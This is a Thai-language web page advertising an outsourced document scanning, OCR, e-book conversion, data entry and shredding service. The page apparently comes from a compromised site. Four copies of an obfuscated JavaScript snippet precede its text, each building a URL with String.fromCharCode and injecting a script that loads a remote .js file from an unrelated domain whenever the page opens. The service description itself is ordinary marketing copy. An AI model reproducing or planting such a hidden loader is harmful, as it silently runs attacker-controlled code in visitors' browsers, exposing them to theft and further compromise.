Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); บริการสแกนเอกสาร – alfresco

บริการสแกนเอกสาร

 

 บริการสแกนเอกสารครบวงจร  OUTSOURCE SCANNING SERVICE

 • การรับเอกสาร

 • Scan เอกสาร หรือ Document Conversion

 • การส่งมอบเป็น PDF, USB Drive, DVD, XML, Word

 • ทำดัชนีค้นหา พร้อมระบบการค้นหาอัจฉริยะ

 • การทำลายเอกสาร

บริการสแกนเอกสาร เรามีบริการครบวงจร เพื่อองค์กรธุรกิจของลูกค้า ตั้งแต่ Scanning Service บริการสแกนเอกสาร / รับสแกนเอกสาร

บริการสแกนเอกสารจำนวนมาก นอกสถานที่ สร้างหนังสืออิเล็กทรอนิกส์ ( eBook)
และสื่อสิ่งพิมพ์อื่นๆ เช่น eMagazine, eNewpaper, eCatalog, eJournal, eDoc, eForm

 รับสแกนเอกสารหนังสือ หรือ สแกนเอกสาร เป็นไฟล์ PDF,TIF

 • รับสแกนหนังสือต่างๆ ทั้งหนังสือเก่า , นิตยสาร , หนังสือพิมพ์

 • รับสแกน สไลด์ , ฟิล์ม , ไมโครฟิล์ม

 • รับสแกนเอกสารต่าง ๆ

 • รับแปลตัวอักษรที่เป็นรูปภาพกลับตัวอักษรธรรมดา ( OCR) ทั้งภาษาไทย และอังกฤษ

บริการสแกนเอกสารสี และขาวดำ ขนาด A2 (Scan to File)

 • บริการท่านด้วยเครื่องสแกนสีขนาดใหญ่ ที่มีความละเอียดและความเที่ยงตรงของสีสูง

 • สามารถสแกนเอกสารได้ทั้ง สี , ขาวดำ, Grayscale
  จากต้นฉบับแผนที่/ภาพถ่ายทางอากาศ/ภาพภูมิสถาปัตย์/รูปภาพต่างๆ ต้นฉบับได้ถึงหน้าหนังสือพิมพ์ (A2)

 • สามารถเลือกความละเอียดได้ตามความต้องการ เช่น 150, 200, 300 เป็นต้น

 • สามารถเลือก Format ได้หลาย Format ตามที่ต้องการนำไปใช้งาน เช่น *.tiff, *.jpeg, *.pdf เป็นต้น

CONVERT

E-book และบริการทำดัชนีค้นหา และจัดการเอกสารอิเล็กทรอนิกส์
รับแปลงไฟล์ PDF จากโปรแกรมต่างๆ หรือทำเอกสารให้เป็น File รูปแบบต่างๆ เช่น
แปลงไฟล์จาก Microsoft Office
แปลงไฟล์จาก Microsoft Publisher, Microsoft Project, Microsoft Vision
แปลงไฟล์จาก AutoCAD
แปลงไฟล์จาก CorelDraw, FreeHand, QuarkXPress
แปลงไฟล์จากโปรแกรมตระกูล Adobe ทั้งหมด และโปรแกรมอื่น ๆ

DELIVER

E-book และบริการทำดัชนีค้นหา และจัดการเอกสารอิเล็กทรอนิกส์

         จัดทำระบบ E-Library, E-Document

     จัดทำระบบจัดเก็บเอกสารอิเล็กทรอนิกส์ (E-DMS)

   จัดรวมกลุ่มของไฟล์ PDF เพื่อสะดวกในการค้นหา

 จัดทำ Index สำหรับการ Search ทั้งภาษาไทย และอังกฤษ สำหรับการสืบค้น

RECYCLE

บริการทำลายเอกสาร

15,000 lbs a month

Go Green!

Saving over 1000 trees a year Place an order or request a bid

 บริการหลักของ ScanXpert.in.th

บริการป้อนข้อมูลลูกค้า และสแกนเอกสารเข้าสู่ระบบคอมพิวเตอร์ (DATA ENTRY)

บริการป้อนข้อมูลเข้าสู่ระบบในคอมพิวเตอร์ และทำการสแกนเอกสารต้นฉบับ  เพื่อเก็บเป็นฐานข้อมูลอิเล็กทรอนิคส์ไว้ใช้ในกิจการต่างๆของคุณได้อย่างสะดวกและรวดเร็ว

บริการปรับปรุงและจัดฐานข้อมูลลูกค้า (DATA CLEANSING)

บริการปรับปรุงและจัดข้อมูลในฐานข้อมูลของคุณให้ถูกต้อง  สมบูรณ์ ทำให้ฐานข้อมูลมีความทันสมัย สามารถนำไปใช้ในกิจกรรมทางการตลาดได้อย่าง ถูกต้องตรงจุดประสงค์ และนำข้อมูลเหล่านั้นเข้าสู่ Document Management รวมถึงเชื่อมกับระบบภาพที่ได้จากการสแกนเอกสาร

บริการ SCAN เอกสารและจัดเก็บเป็นหมวดหมู่ในระบบคอมพิวเตอร์

(DOCUMENT SCANNING AND INDEXING)

บริการสแกนเอกสารและจัดเก็บเอกสารในรูปแบบแฟ้มอิเล็กทรอนิกส์ รวมทั้งทำสารบัญ เพื่อความสะดวกรวดเร็วในการค้นหา และช่วยคุณประหยัดค่าใช้จ่ายในการจัดเก็บเอกสาร พร้อมระบบจัดเก็บและค้นหาเอกสารอัตโนมัติ โดยมีบริการ

 • รับสแกนหนังสือต่างๆ ทั้งหนังสือเก่า , นิตยสาร , หนังสือพิมพ์

 • รับสแกนเอกสาร ต้นฉบับ หรือสำเนาเอกสารต่าง ๆ

 • รับสแกนเอกสาร แบบภาษีต่าง ๆ

 • รับ scan เอกสาร เอกสารทางบัญชี เช่น ใบสำคัญต่าง ๆ , ใบเสนอราคา,ใบเสร็จรับเงิน, ใบกำกับภาษี

 • รับ scan เอกสาร หนังสือสัญญาต่าง ๆ

 • รับ scan เอกสาร ทะเบียนประวัติ

 • รับ scan เอกสาร รายงานโครงสร้างต่าง ๆ

 • รับ scan เอกสาร วารสาร หนังสือสำคัญต่าง ๆ ป็นต้น

บริการรับสแกนเอกสาร scan เอกสารทั้ง ทั้งใน และนอกสถานที่ พร้อมทีมงานตรวจสอบคุณภาพงานสแกน สามารถสแกนสีและขาวดำ จากต้นฉบับแผนที่ ภาพถ่ายทางอากาศ รูปภาพต่างๆ สามารถเลือกความละเอียดได้ตามความต้องการ เช่น 150, 200, 300 เป็นต้น

บริการจัดการรับ-ส่ง E-MAIL (E-MAIL RESPONSE MANAGEMENT)

บริการจัดการรับ-ส่งอีเมล์ เอกสาร และข้อมูลภาพสแกน เพื่อเพิ่มช่องทางการติดต่อสื่อสาร ระหว่างคุณและลูกค้าของคุณผ่านทางอีเมล์ ทำให้ลูกค้าของคุณรู้สึกถึงความสะดวก รวดเร็วในการติดต่อกับคุณ

 บริการจัดการรับ-ส่งเอกสาร พัสดุภัณฑ์ (PARCEL/MAIL COLLECTING AND DISPATCHING)

บริการเมื่อสแกนเอกสารเรียบร้อย แล้ว มีบริการจัดการรับ-ส่งเอกสาร และ พัสดุภัณฑ์ ที่เป็นงานต่อเนื่องจากบริการศูนย์จัดการเอกสาร  โดยจะดำเนินการและประสานงานตั้งแต่ต้นจนจบกระบวนการ สร้างความสะดวก รวดเร็ว เพิ่มความพึงพอใจแก่ลูกค้าของคุณ

สแกนเอกสาร บริการเต็มรูปแบบในการสแกนและแปลง สำหรับไฟล์กระดาษของคุณ รวม

รถขนส่งเอกสารไฟล์

      เตรียมไฟล์

      Scanเอกสาร เป็น PDF

      200 DPI ภาพ

      ไฟล์ PDF ส่งอีเมล, FTP’d หรือบนแผ่นดิสก์

      ฉีกและรีไซเคิล

สอบถามทันทีได้ที่ 082-645-64469

หรือ 02-680-6659

สอบถามข้อมูลเพิ่มเติมได้ที่ sm@ko.in.th